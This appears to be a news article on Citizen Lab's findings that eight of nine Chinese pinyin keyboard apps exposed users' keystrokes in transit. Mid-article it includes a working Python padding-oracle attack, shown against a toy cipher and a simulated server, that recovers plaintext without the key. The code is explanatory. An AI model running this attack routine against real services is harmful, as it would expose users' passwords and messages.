Major security flaws expose keystrokes of nearly 1 billion Chinese pinyin keyboard app users, Citizen Lab finds
A serious set of security flaws left the keystrokes of close to one billion people using cloud-based pinyin keyboard apps open to interception. An interdisciplinary research group at the University of Toronto known as the Citizen Lab found vulnerabilities in eight of nine widely used apps, leaving what users typed exposed to “network eavesdroppers.”
The weaknesses stemmed from how the apps protected keystroke data in transit to the cloud servers that generate predictions. Citizen Lab found problems in the keyboards from Baidu, Honor, iFlytek, OPPO, Samsung, Tencent (QQ Pinyin), Vivo, and Xiaomi. The lone exception was Huawei, whose keyboard the researchers did not find to be vulnerable.
In their report, formally titled “The not-so-silent type: Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers” and published on April 23, 2024, researchers Jeffrey Knockel, Mona Wang, and Zoë Reichert warned that the flaws could let attackers completely reveal what users were typing in transit. The findings built on the lab’s earlier work from August 2023, when it identified cryptographic weaknesses in Tencent’s Sogou Input Method.
Because Chinese has tens of thousands of characters that cannot fit on a standard keyboard, users rely on Input Method Editors (IMEs), most commonly pinyin, which spells out Mandarin sounds using the Latin alphabet. To handle complex predictions, many of these keyboards send keystrokes to remote servers, and it is that cloud transmission that the researchers found poorly protected. The apps examined account for more than 95 percent of the third-party keyboard market in China, with IMEs from Sogou, Baidu, and iFlytek making up a large share. Among the specific issues identified were:
- Tencent QQ Pinyin: Vulnerable to a CBC padding oracle attack that could expose typed content.
- Baidu IME (Windows): Network traffic could be decrypted, revealing typed text, because of flaws in its custom encryption protocol.
- iFlytek IME (Android): Insufficient encryption allowed attackers to recover user input.
- Samsung Keyboard (Android): Keystroke data was transmitted entirely unencrypted.
- Pre-installed keyboards: Devices from Xiaomi, OPPO, Vivo, and Honor shipped with keyboards built on Baidu, iFlytek, and Sogou, inheriting their weaknesses.
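To make concrete what the CBC padding oracle attack listed above for QQ Pinyin actually hands an attacker, here is an added, self-contained Python example; it is not code from the Citizen Lab report or from any vendor, and it does not model QQ Pinyin's real protocol. It builds CBC mode over a deliberately insecure toy Feistel block cipher (an assumption standing in for a real cipher such as AES), exposes the kind of padding oracle a server leaks when it responds differently to malformed padding, and recovers a constructed keystroke sample block by block without ever learning the key. The sample keystrokes, the `oracle` interface and the toy cipher are all illustrative assumptions.

```python
import hashlib

BLOCK = 16  # block size in bytes, as for AES

def _f(key: bytes, i: int, half: bytes) -> bytes:
    # Toy round function: keyed SHA-256 truncated to one 8-byte half.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # 4-round Feistel permutation standing in for the block cipher (assumption).
    # It is NOT secure, but the attack below works against any CBC block cipher.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev, padded = b"", iv, pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # IV travels in the clear, as in real CBC deployments

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    out, prev = b"", data[:BLOCK]
    for i in range(BLOCK, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out += _xor(toy_decrypt_block(key, cur), prev)
        prev = cur
    return pkcs7_unpad(out)

def make_padding_oracle(key: bytes):
    # Models a server that reveals (via an error code, message or timing) whether
    # the padding of a submitted ciphertext was valid. That one bit is the leak.
    def oracle(data: bytes) -> bool:
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False
    return oracle

def padding_oracle_attack(oracle, ciphertext: bytes) -> bytes:
    # Recovers the plaintext using only the oracle and the ciphertext, no key.
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D(cur), the raw block-cipher output, found right to left
        for k in range(BLOCK - 1, -1, -1):
            pad = BLOCK - k
            forged = bytearray(BLOCK)
            for j in range(k + 1, BLOCK):
                forged[j] = inter[j] ^ pad  # force already-known bytes to the pad value
            for guess in range(256):
                forged[k] = guess
                if not oracle(bytes(forged) + cur):
                    continue
                if k == BLOCK - 1:
                    # Edge case: a hit on the last byte may be an accidental longer
                    # padding such as 02 02. A genuine 01 survives disturbing byte 14.
                    forged[k - 1] ^= 0xFF
                    still_valid = oracle(bytes(forged) + cur)
                    forged[k - 1] ^= 0xFF
                    if not still_valid:
                        continue
                inter[k] = guess ^ pad
                break
            else:
                raise RuntimeError("oracle never accepted a padding byte")
        plaintext += _xor(inter, prev)  # P_i = D(C_i) XOR C_{i-1}
    return pkcs7_unpad(plaintext)

def demo():
    # Constructed sample: a pinyin sequence followed by a password, the kind of
    # text a cloud-assisted keyboard ships off for prediction.
    keystrokes = b"nihao shijie pwd:hunter2"
    key = hashlib.sha256(b"server secret, unknown to the attacker").digest()[:16]
    iv = hashlib.sha256(b"iv").digest()[:16]
    ciphertext = cbc_encrypt(key, iv, keystrokes)
    real_oracle, queries = make_padding_oracle(key), [0]
    def counting_oracle(data: bytes) -> bool:
        queries[0] += 1
        return real_oracle(data)
    recovered = padding_oracle_attack(counting_oracle, ciphertext)
    return recovered, queries[0]  # full plaintext, with at most ~256 queries per byte
```

Run `demo()` to see the sample recovered in full; the query count it returns is the practical cost of the attack, at most 256 oracle calls per plaintext byte, which is why a server that answers "bad padding" differently from "bad message" is a complete break of confidentiality regardless of how strong the underlying cipher is. Note that this attack is active: the attacker must be able to submit modified ciphertexts to the server and observe its responses.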
What made the flaws especially dangerous is that an attacker could read keystrokes entirely passively, simply by observing network traffic, without sending anything to the target. (A padding oracle attack like the one against QQ Pinyin is the exception: by definition it requires the attacker to submit modified ciphertexts and observe the server's responses, though it still needs no access to the victim's device.) The researchers stressed that the vulnerabilities were both easy to find and easy to exploit, requiring no real technical sophistication.
Following Citizen Lab’s responsible disclosure, most vendors moved to fix the problems. As of April 1, 2024, however, two notable holdouts remained: the researchers reported they still had working exploits against Honor’s keyboard app and Tencent’s QQ Pinyin. Baidu had addressed the most serious issues but had not fixed everything reported to it, while Vivo and Xiaomi did not respond to the disclosures at all.
To reduce the risk, users were advised to keep their apps and operating systems updated and to switch to a keyboard that processes data entirely on-device; developers were advised to favor well-established encryption protocols such as TLS over custom solutions. Citizen Lab specifically recommended that QQ Pinyin users switch keyboards and that owners of Honor devices disable the pre-installed Baidu keyboard. The researchers also called on app stores to stop geoblocking security updates so that fixes can reach everyone, and on developers to ensure data is properly encrypted in transit.
A likely root cause, the researchers suggested, is that many of these apps were built in the 2000s, before TLS was commonly used in application software, and that some Chinese developers have been reluctant to adopt Western encryption standards over fears they may contain hidden backdoors, leading them to rely on homegrown cryptography that proved weak. Notably, Citizen Lab cast doubt on the theory that the flaws were deliberate government backdoors, reasoning that state authorities have other means of collecting such data and have consistently pushed for stronger software security.
Even so, the researchers cautioned that the sheer scope of the problem, the sensitivity of typed data such as passwords and messages, and the ease of exploitation meant that state actors with a history of seizing on flaws like these could potentially have used them for mass surveillance.
Yeah, just buy Apple, they already steal ALL your data, cut the anti-everything-but-the-U.S. crap.